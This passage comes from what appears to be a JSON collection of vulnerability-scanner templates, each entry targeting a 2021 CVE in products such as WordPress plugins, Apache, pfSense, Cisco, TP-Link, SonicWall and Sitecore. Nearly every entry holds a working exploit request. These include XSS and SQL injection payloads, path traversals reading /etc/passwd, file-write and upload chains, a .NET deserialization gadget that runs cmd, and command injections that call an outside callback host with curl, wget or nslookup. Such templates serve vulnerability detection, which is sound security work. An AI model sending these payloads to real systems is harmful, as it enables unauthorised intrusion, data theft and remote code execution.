Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40908","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"CVE-2021-40870\"); ?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["0d95513363fd69b9fee712f333293654"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, 